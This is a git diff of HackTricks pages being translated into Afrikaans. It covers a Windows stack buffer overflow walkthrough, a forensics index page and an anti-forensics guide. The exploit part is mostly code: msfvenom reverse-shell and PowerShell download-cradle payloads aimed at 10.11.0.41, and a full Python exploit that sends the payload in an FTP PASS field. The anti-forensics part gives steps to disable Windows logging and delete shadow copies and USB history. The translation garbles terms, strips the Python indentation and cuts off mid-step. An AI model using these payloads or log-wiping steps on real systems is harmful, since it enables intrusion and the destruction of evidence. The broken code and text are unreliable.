3000 ``` +Verander die buffer van die uitbuit en stel die patroon in en voer die uitbuit uit. -Change the buffer of the exploit and set the pattern and lauch the exploit. - -A new crash should appeard, but with a different EIP address: +'n Nuwe crash moet verskyn, maar met 'n ander EIP-adres: ![](<../.gitbook/assets/image (27) (1) (1).png>) -Check if the address was in your pattern: +Kyk of die adres in jou patroon was: ![](<../.gitbook/assets/image (28) (1) (1).png>) - ``` /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438 ``` +Lyk asof **ons die EIP in offset 2606 kan wysig** van die buffer. -Looks like **we can modify the EIP in offset 2606** of the buffer. - -Check it modifing the buffer of the exploit: - +Kyk daarna deur die buffer van die aanval te wysig: ``` buffer = 'A'*2606 + 'BBBB' + 'CCCC' ``` - -With this buffer the EIP crashed should point to 42424242 ("BBBB") +Met hierdie buffer moet die EIP-gekraakte punt na 42424242 ("BBBB") wys. ![](<../.gitbook/assets/image (30) (1) (1).png>) ![](<../.gitbook/assets/image (29) (1) (1).png>) -Looks like it is working. +Dit lyk asof dit werk. -## Check for Shellcode space inside the stack +## Kontroleer vir Shellcode-ruimte binne die stapel -600B should be enough for any powerfull shellcode. - -Lets change the bufer: +600B moet genoeg wees vir enige kragtige shellcode. +Laat ons die buffer verander: ``` buffer = 'A'*2606 + 'BBBB' + 'C'*600 ``` - -launch the new exploit and check the EBP and the length of the usefull shellcode +Begin deur die nuwe uitbuiting te begin en die EBP en lengte van die bruikbare skuldkode te kontroleer. ![](<../.gitbook/assets/image (31) (1).png>) ![](<../.gitbook/assets/image (32) (1).png>) -You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here. +Jy kan sien dat wanneer die kwesbaarheid bereik word, wys die EBP na die skuldkode en dat ons baie spasie het om 'n skuldkode hier te plaas. -In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough. +In hierdie geval het ons **vanaf 0x0209A128 tot 0x0209A2D6 = 430B.** Genoeg. -## Check for bad chars - -Change again the buffer: +## Kontroleer vir slegte karakters +Verander weer die buffer: ``` badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" @@ -153,30 +169,27 @@ badchars = ( ) buffer = 'A'*2606 + 'BBBB' + badchars ``` +Die slegte karakters begin by 0x01 omdat 0x00 amper altyd sleg is. -The badchars starts in 0x01 because 0x00 is almost always bad. +Voer die aanval herhaaldelik uit met hierdie nuwe buffer deur die karakters wat nutteloos is, te verwyder: -Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:. +Byvoorbeeld: -For example: - -In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09). +In hierdie geval kan jy sien dat **jy nie die karakter 0x0A moet gebruik nie** (niks word in die geheue gestoor aangesien die karakter 0x09 is). ![](<../.gitbook/assets/image (33) (1).png>) -In this case you can see that **the char 0x0D is avoided**: +In hierdie geval kan jy sien dat **die karakter 0x0D vermy word**: ![](<../.gitbook/assets/image (34) (1).png>) -## Find a JMP ESP as a return address - -Using: +## Vind 'n JMP ESP as 'n terugkeeradres +Gebruik: ``` !mona modules #Get protections, look for all false except last one (Dll of SO) ``` - -You will **list the memory maps**. Search for some DLl that has: +Jy sal die geheuekaarte lys. Soek na 'n paar DLL's wat die volgende eienskappe het: * **Rebase: False** * **SafeSEH: False** @@ -186,30 +199,25 @@ You will **list the memory maps**. Search for some DLl that has: ![](<../.gitbook/assets/image (35) (1).png>) -Now, inside this memory you should find some JMP ESP bytes, to do that execute: - +Nou, binne hierdie geheue moet jy 'n paar JMP ESP-bytes vind. Om dit te doen, voer die volgende uit: ``` !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case ``` - -**Then, if some address is found, choose one that don't contain any badchar:** +**Dan, as 'n adres gevind word, kies een wat geen slegte karakters bevat nie:** ![](<../.gitbook/assets/image (36) (1).png>) -**In this case, for example: \_0x5f4a358f**\_ - -## Create shellcode +**In hierdie geval, byvoorbeeld: \_0x5f4a358f**\_ +## Skep shellcode ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d' msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d' ``` +As die uitbuit nie werk nie, maar dit moet (jy kan sien met ImDebg dat die shellcode bereik word), probeer om ander shellcodes te skep (msfvenom sal verskillende shellcodes skep vir dieselfde parameters). -If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters). - -**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit: - +**Voeg 'n paar NOPS aan die begin** van die shellcode by en gebruik dit en die terugkeeradres om te JMP ESP, en voltooi die uitbuit: ```bash #!/usr/bin/python @@ -248,39 +256,36 @@ shellcode = ( buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode try: - print "\nLaunching exploit..." - s.connect((ip, port)) - data = s.recv(1024) - s.send('USER username' +'\r\n') - data = s.recv(1024) - s.send('PASS ' + buffer + '\r\n') - print "\nFinished!." +print "\nLaunching exploit..." +s.connect((ip, port)) +data = s.recv(1024) +s.send('USER username' +'\r\n') +data = s.recv(1024) +s.send('PASS ' + buffer + '\r\n') +print "\nFinished!." except: - print "Could not connect to "+ip+":"+port +print "Could not connect to "+ip+":"+port ``` - {% hint style="warning" %} -There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode +Daar is shellcodes wat **hulself sal oorskryf**, daarom is dit belangrik om altyd 'n paar NOPs voor die shellcode by te voeg. {% endhint %} -## Improving the shellcode - -Add this parameters: +## Verbetering van die shellcode +Voeg hierdie parameters by: ``` EXITFUNC=thread -e x86/shikata_ga_nai ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/forensics/basic-forensic-methodology/README.md b/forensics/basic-forensic-methodology/README.md index 5b1e70c22..a87fc8018 100644 --- a/forensics/basic-forensic-methodology/README.md +++ b/forensics/basic-forensic-methodology/README.md @@ -1,40 +1,40 @@ -# Basic Forensic Methodology +# Basiese Forensiese Metodologie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Creating and Mounting an Image +## Skep en Monteer 'n Beeld {% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md" %} [image-acquisition-and-mount.md](../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md) {% endcontent-ref %} -## Malware Analysis +## Malware-analise -This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**: +Dit is **nie noodwendig die eerste stap om uit te voer nadat jy die beeld het nie**. Maar jy kan hierdie malware-analise tegnieke onafhanklik gebruik as jy 'n lêer, 'n lêerstelselbeeld, geheuebeeld, pcap... het, so dit is goed om **hierdie aksies in gedagte te hou**: {% content-ref url="malware-analysis.md" %} [malware-analysis.md](malware-analysis.md) {% endcontent-ref %} -## Inspecting an Image +## Inspekteer 'n Beeld -if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in: +As jy 'n **forensiese beeld** van 'n toestel gekry het, kan jy begin **analiseer die partisies, lêerstelsel** wat gebruik word en **herwin** potensieel **interessante lêers** (selfs uitgewisde lêers). Leer hoe om dit te doen: {% content-ref url="partitions-file-systems-carving/" %} [partitions-file-systems-carving](partitions-file-systems-carving/) {% endcontent-ref %} -Depending on the used OSs and even platform different interesting artifacts should be searched: +Afhanklik van die gebruikte bedryfstelsels en selfs platforms moet verskillende interessante artefakte gesoek word: {% content-ref url="windows-forensics/" %} [windows-forensics](windows-forensics/) @@ -48,42 +48,42 @@ Depending on the used OSs and even platform different interesting artifacts shou [docker-forensics.md](docker-forensics.md) {% endcontent-ref %} -## Deep inspection of specific file-types and Software +## Diep inspeksie van spesifieke lêertipes en sagteware -If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\ -Read the following page to learn some interesting tricks: +As jy 'n baie **verdagte lêer** het, dan kan verskeie **truuks** nuttig wees, afhangende van die lêertipe en sagteware wat dit geskep het.\ +Lees die volgende bladsy om 'n paar interessante truuks te leer: {% content-ref url="specific-software-file-type-tricks/" %} [specific-software-file-type-tricks](specific-software-file-type-tricks/) {% endcontent-ref %} -I want to do a special mention to the page: +Ek wil 'n spesiale vermelding maak van die bladsy: {% content-ref url="specific-software-file-type-tricks/browser-artifacts.md" %} [browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md) {% endcontent-ref %} -## Memory Dump Inspection +## Geheue-uitstorting-inspeksie {% content-ref url="memory-dump-analysis/" %} [memory-dump-analysis](memory-dump-analysis/) {% endcontent-ref %} -## Pcap Inspection +## Pcap-inspeksie {% content-ref url="pcap-inspection/" %} [pcap-inspection](pcap-inspection/) {% endcontent-ref %} -## **Anti-Forensic Techniques** +## **Anti-Forensiese Tegnieke** -Keep in mind the possible use of anti-forensic techniques: +Hou moontlike gebruik van anti-forensiese tegnieke in gedagte: {% content-ref url="anti-forensic-techniques.md" %} [anti-forensic-techniques.md](anti-forensic-techniques.md) {% endcontent-ref %} -## Threat Hunting +## Bedreigingsjag {% content-ref url="file-integrity-monitoring.md" %} [file-integrity-monitoring.md](file-integrity-monitoring.md) @@ -91,12 +91,12 @@ Keep in mind the possible use of anti-forensic techniques:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md index 91f89eb8e..064297eb3 100644 --- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,181 +1,173 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Timestamps +# Tydstempels -An attacker may be interested in **changing the timestamps of files** to avoid being detected.\ -It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __ and __ `$FILE_NAME`. +'n Aanvaller mag belangstel om die tydstempels van lêers te **verander** om opsporing te vermy.\ +Dit is moontlik om die tydstempels binne die MFT in eienskappe `$STANDARD_INFORMATION` __ en __ `$FILE_NAME` te vind. -Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB). +Beide eienskappe het 4 tydstempels: **Wysiging**, **toegang**, **skepping**, en **MFT-registervoortgangswysiging** (MACE of MACB). -**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**. +**Windows verkenner** en ander gereedskap wys die inligting vanaf **`$STANDARD_INFORMATION`**. -## TimeStomp - Anti-forensic Tool +## TimeStomp - Anti-forensiese Gereedskap -This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**. +Hierdie gereedskap **verander** die tydstempelinligting binne **`$STANDARD_INFORMATION`** **maar nie** die inligting binne **`$FILE_NAME`** nie. Daarom is dit moontlik om **verdagte aktiwiteit te identifiseer**. ## Usnjrnl -The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes. +Die **USN Joernaal** (Update Sequence Number Journal) is 'n kenmerk van die NTFS (Windows NT-lêersisteem) wat volume-veranderinge byhou. Die [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) gereedskap maak dit moontlik om hierdie veranderinge te ondersoek. ![](<../../.gitbook/assets/image (449).png>) -The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file. +Die vorige prentjie is die **uitset** wat deur die **gereedskap** gewys word waar dit waargeneem kan word dat sommige **veranderinge aan die lêer uitgevoer is**. ## $LogFile -**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes. +**Alle metadata-veranderinge aan 'n lêersisteem word gelog** in 'n proses wat bekend staan as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Die gelogde metadata word in 'n lêer genaamd `**$LogFile**` gehou, wat in die hoofgids van 'n NTFS-lêersisteem geleë is. Gereedskap soos [LogFileParser](https://github.com/jschicht/LogFileParser) kan gebruik word om hierdie lêer te ontled en veranderinge te identifiseer. ![](<../../.gitbook/assets/image (450).png>) -Again, in the output of the tool it's possible to see that **some changes were performed**. +Weereens, in die uitset van die gereedskap is dit moontlik om te sien dat **sommige veranderinge uitgevoer is**. -Using the same tool it's possible to identify to **which time the timestamps were modified**: +Met dieselfde gereedskap is dit moontlik om te identifiseer **watter tyd die tydstempels verander is**: ![](<../../.gitbook/assets/image (451).png>) -* CTIME: File's creation time -* ATIME: File's modification time -* MTIME: File's MFT registry modification -* RTIME: File's access time +* CTIME: Lêer se skeppingstyd +* ATIME: Lêer se wysigingstyd +* MTIME: Lêer se MFT-registervoortgangswysiging +* RTIME: Lêer se toegangstyd -## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison +## Vergelyking van `$STANDARD_INFORMATION` en `$FILE_NAME` -Another way to identify suspicious modified files would be to compare the time on both attributes looking for **mismatches**. +'n Ander manier om verdagte gewysigde lêers te identifiseer, sou wees om die tyd in beide eienskappe te vergelyk en te soek na **verskille**. -## Nanoseconds +## Nanosekondes -**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**. +**NTFS**-tydstempels het 'n **presisie** van **100 nanosekondes**. Om dan lêers met tydstempels soos 2010-10-10 10:10:**00.000:0000 te vind, is baie verdag**. -## SetMace - Anti-forensic Tool +## SetMace - Anti-forensiese Gereedskap -This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME`. However, from Windows Vista, it's necessary for a live OS to modify this information. +Hierdie gereedskap kan beide eienskappe `$STARNDAR_INFORMATION` en `$FILE_NAME` verander. Vanaf Windows Vista is dit egter nodig vir 'n lewendige bedryfstelsel om hierdie inligting te verander. -# Data Hiding +# Data Versteek -NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the file is deleted. Then, it's possible to **hide data in this slack space**. +NFTS gebruik 'n groep en die minimum inligtingsgrootte. Dit beteken dat as 'n lêer 'n groep en 'n half gebruik, sal die **oorskietende helfte nooit gebruik word nie** totdat die lêer uitgevee word. Dit is dan moontlik om data in hierdie "verborge" spasie te **versteek**. -There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added: +Daar is gereedskap soos slacker wat dit moontlik maak om data in hierdie "verborge" spasie te versteek. 'n Ontleding van die `$logfile` en `$usnjrnl` kan egter wys dat daar data bygevoeg is: ![](<../../.gitbook/assets/image (452).png>) -Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted. +Dit is dan moontlik om die spasie te herwin deur gereedskap soos FTK Imager te gebruik. Let daarop dat hierdie soort gereedskap die inhoud geobskureer of selfs versleutel kan stoor. # UsbKill -This is a tool that will **turn off the computer if any change in the USB** ports is detected.\ -A way to discover this would be to inspect the running processes and **review each python script running**. +Dit is 'n gereedskap wat die rekenaar sal **afskakel as enige verandering in die USB-poorte** opgespoor word.\ +'n Manier om dit te ontdek sou wees om die lopende prosesse te ondersoek en **elke python-skripsie wat loop te hersien**. -# Live Linux Distributions +# Lewende Linux-verspreidings -These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion. +Hierdie verspreidings word **uitgevoer binne die RAM-geheue**. Die enigste manier om hulle op te spoor is **as die NTFS-lêersisteem met skryfregte aangeheg is**. As dit net met leesregte aangeheg is, sal dit nie moontlik wees om die indringing op te spoor nie. -# Secure Deletion +# Veilige Skrapping [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization) -# Windows Configuration +# Windows-konfigurasie -It's possible to disable several windows logging methods to make the forensics investigation much harder. +Dit is moontlik om verskeie Windows-loggingsmetodes uit te skakel om die forensiese ondersoek baie moeiliker te maak. -## Disable Timestamps - UserAssist +## Skakel Tydstempels Af - UserAssist -This is a registry key that maintains dates and hours when each executable was run by the user. +Dit is 'n registerleutel wat datums en ure behou wanneer elke uitvoerbare lêer deur die gebruiker uitgevoer is. -Disabling UserAssist requires two steps: +Om UserAssist uit te skakel, is twee stappe nodig: -1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled. -2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. +1. Stel twee registerleutels, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` en `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, beide op nul om aan te dui dat ons UserAssist wil uitskakel. +2. Wis jou register-subbome wat lyk soos `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. -## Disable Timestamps - Prefetch +## Skakel Tydstempels Af - Prefetch -This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices. +Dit sal inligting oor die uitgevoerde toepassings stoor met die doel om die prestasie van die Windows-stelsel te verbeter. Dit kan egter ook nuttig wees vir forensiese praktyke. -* Execute `regedit` -* Select the file path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` -* Right-click on both `EnablePrefetcher` and `EnableSuperfetch` -* Select Modify on each of these to change the value from 1 (or 3) to 0 -* Restart +* Voer `regedit` uit +* Kies die lêerpad `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` +* Regskliek op beide `EnablePrefetcher` en `EnableSuperfetch` +* Kies Wysig op elkeen van hierdie om die waarde van 1 (of 3) na 0 te verander +* Herlaai -## Disable Timestamps - Last Access Time +## Skakel Tydstempels Af - Laaste Toegangstyd -Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance. +Telkens wanneer 'n gids vanaf 'n NTFS-volume op 'n Windows NT-bediener geopen word, neem die stelsel die tyd om 'n tydstempelveld op elke gelysde gids op te dateer, genaamd die laaste toegangstyd. Op 'n baie gebruikte NTFS-volume kan dit die prestasie beïnvloed. -1. Open the Registry Editor (Regedit.exe). -2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. -3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process. -4. Close the Registry Editor, and reboot the server. +1. Maak die Registerredigeerder (Regedit +## Verwyder USB Geskiedenis -## Delete USB History +Al die **USB-toestelinskrywings** word gestoor in die Windows-registreerder onder die **USBSTOR**-registreersleutel wat sub-sleutels bevat wat geskep word wanneer jy 'n USB-toestel in jou rekenaar of draagbare rekenaar steek. Jy kan hierdie sleutel vind by H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deur dit te verwyder**, sal jy die USB-geskiedenis verwyder.\ +Jy kan ook die hulpmiddel [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) gebruik om seker te maak dat jy hulle verwyder het (en om hulle te verwyder). -All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\ -You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them). +'n Ander lêer wat inligting oor die USB's stoor, is die lêer `setupapi.dev.log` binne `C:\Windows\INF`. Dit moet ook verwyder word. -Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted. +## Deaktiveer Skaduwee Kopieë -## Disable Shadow Copies +**Lys** skaduwee kopieë met `vssadmin list shadowstorage`\ +**Verwyder** hulle deur `vssadmin delete shadow` uit te voer -**List** shadow copies with `vssadmin list shadowstorage`\ -**Delete** them running `vssadmin delete shadow` +Jy kan hulle ook via die GUI verwyder deur die stappe te volg wat voorgestel word in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) -You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) +Om skaduwee kopieë te deaktiveer [stappe vanaf hier](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): -To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): +1. Maak die Dienste-program oop deur "dienste" in die tekssoekkasie in te tik nadat jy op die Windows-beginknoppie geklik het. +2. Vind "Volume Shadow Copy" in die lys, kies dit, en kry toegang tot Eienskappe deur regs te klik. +3. Kies "Gedeaktiveer" uit die "Beginsoort" keuselys, en bevestig dan die verandering deur op Toepas en OK te klik. -1. Open the Services program by typing "services" into the text search box after clicking the Windows start button. -2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking. -3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK. +Dit is ook moontlik om die konfigurasie te wysig van watter lêers in die skaduwee kopie 